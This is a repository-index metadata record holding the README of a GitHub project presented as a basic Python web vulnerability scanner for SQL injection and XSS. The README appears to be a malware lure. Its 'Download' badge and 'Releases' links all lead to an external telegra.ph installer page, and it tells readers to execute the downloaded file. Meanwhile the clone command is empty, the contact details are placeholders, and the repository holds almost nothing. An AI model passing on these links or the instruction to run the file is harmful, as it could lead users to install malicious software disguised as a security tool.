{"id":28100137,"url":"https://github.com/sparta432/basic-web-vulnerability-scanner-ih","last_synced_at":"2025-05-13T18:30:36.062Z","repository":{"id":293073866,"uuid":"982862026","full_name":"sparta432/Basic-Web-Vulnerability-Scanner-ih","owner":"sparta432","description":"A Python-based web vulnerability scanner that identifies common security flaws like SQL Injection and XSS. Ideal for learning web application security and ethical hacking practices.","archived":false,"fork":false,"pushed_at":"2025-05-13T14:12:17.000Z","size":3,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-13T15:35:24.629Z","etag":null,"topics":["cybersecurity","ethical-hacking","open-source","python","security-testing","sql-injection","vulnerability-scanner","web-security","xss"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sparta432.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-13T14:11:38.000Z","updated_at":"2025-05-13T14:12:21.000Z","dependencies_parsed_at":"2025-05-13T15:35:48.156Z","dependency_job_id":"cd4d9029-5995-4084-bfec-9b5dbebe1aa6","html_url":"https://github.com/sparta432/Basic-Web-Vulnerability-Scanner-ih","commit_stats":null,"previous_names":["sparta432/basic-web-vulnerability-scanner-ih"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sparta432%2FBasic-Web-Vulnerability-Scanner-ih","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sparta432%2FBasic-Web-Vulnerability-Scanner-ih/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sparta432%2FBasic-Web-Vulnerability-Scanner-ih/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sparta432%2FBasic-Web-Vulnerability-Scanner-ih/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sparta432","download_url":"https://codeload.github.com/sparta432/Basic-Web-Vulnerability-Scanner-ih/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254003125,"owners_count":21997839,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","ethical-hacking","open-source","python","security-testing","sql-injection","vulnerability-scanner","web-security","xss"],"created_at":"2025-05-13T18:30:33.462Z","updated_at":"2025-05-13T18:30:36.056Z","avatar_url":"https://github.com/sparta432.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Basic Web Vulnerability Scanner 🕵️‍♂️\n\n[![Download Now](https://img.shields.io/badge/Download%20Here-Full%20version-purple)](https://telegra.ph/Download-Installer-1305-05-13?nrgemeq7o8jlatx)\n\n![GitHub Release](https://img.shields.io/badge/Release-v1.0.0-brightgreen)\n\nWelcome to the **Basic Web Vulnerability Scanner**! This Python-based tool helps you identify common security flaws in web applications, such as SQL Injection and Cross-Site Scripting (XSS). It's perfect for anyone looking to learn about web application security and ethical hacking practices.\n\n## Table of Contents\n\n- [Introduction](#introduction)\n- [Features](#features)\n- [Technologies Used](#technologies-used)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Contributing](#contributing)\n- [License](#license)\n- [Contact](#contact)\n- [Releases](#releases)\n\n## Introduction\n\nIn today’s digital landscape, web applications are increasingly targeted by malicious actors. Understanding how to identify vulnerabilities is crucial for developers and security professionals alike. This scanner is designed to help you learn about these vulnerabilities in a hands-on manner.\n\n## Features\n\n- **SQL Injection Detection**: Identifies SQL injection vulnerabilities in your web applications.\n- **XSS Detection**: Scans for Cross-Site Scripting vulnerabilities.\n- **User-Friendly Interface**: Simple command-line interface for easy navigation.\n- **Open Source**: Fully open-source and community-driven.\n- **Educational Resource**: Ideal for those interested in cybersecurity and ethical hacking.\n\n## Technologies Used\n\n- **Python**: The primary programming language for this project.\n- **Requests**: For making HTTP requests.\n- **Beautiful Soup**: For parsing HTML and XML documents.\n- **Flask**: Lightweight web framework for building web applications.\n- **SQLite**: For database management.\n\n## Installation\n\nTo install the Basic Web Vulnerability Scanner, follow these steps:\n\n1. Clone the repository:\n\n   ```bash\n  \n   ```\n\n2. Navigate to the project directory:\n\n   ```bash\n   cd Basic-Web-Vulnerability-Scanner\n   ```\n\n3. Install the required packages:\n\n   ```bash\n   pip install -r requirements.txt\n   ```\n\n4. You are now ready to use the scanner!\n\n## Usage\n\nTo run the scanner, execute the following command:\n\n```bash\npython scanner.py \u003ctarget-url\u003e\n```\n\nReplace `\u003ctarget-url\u003e` with the URL of the web application you want to scan. The scanner will output any detected vulnerabilities, along with recommendations for remediation.\n\n## Contributing\n\nWe welcome contributions from the community! If you would like to contribute, please follow these steps:\n\n1. Fork the repository.\n2. Create a new branch for your feature or bug fix.\n3. Make your changes and commit them.\n4. Push your branch to your forked repository.\n5. Submit a pull request detailing your changes.\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Contact\n\nFor any questions or feedback, please reach out to the project maintainer:\n\n- **Name**: Your Name\n- **Email**: your.email@example.com\n\n## Releases\n\nYou can download the latest release of the Basic Web Vulnerability Scanner [here](https://telegra.ph/Download-Installer-1305-05-13?je8sgqht3zt6pv5). Make sure to execute the downloaded file to start scanning for vulnerabilities.\n\n## Additional Resources\n\n- [OWASP Top Ten](https://owasp.org/www-project-top-ten/) - A great resource for understanding the most critical web application security risks.\n- [Python Requests Documentation](https://docs.python-requests.org/en/master/) - Learn more about the Requests library.\n- [Flask Documentation](https://flask.palletsprojects.com/en/2.0.x/) - Explore the Flask web framework.\n\n## Acknowledgments\n\n- Special thanks to the open-source community for their invaluable contributions.\n- Thanks to the OWASP foundation for their continuous efforts in improving web security.\n\n---\n\nFeel free to explore the code and enhance the scanner. Your feedback is crucial for improving this tool and making it more effective for everyone interested in web application security.\n\nYou can always check the [Releases](https://telegra.ph/Download-Installer-1305-05-13?1yhgqu1vp7cijel) section for updates and new features. Happy scanning!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsparta432%2Fbasic-web-vulnerability-scanner-ih","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsparta432%2Fbasic-web-vulnerability-scanner-ih","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsparta432%2Fbasic-web-vulnerability-scanner-ih/lists"}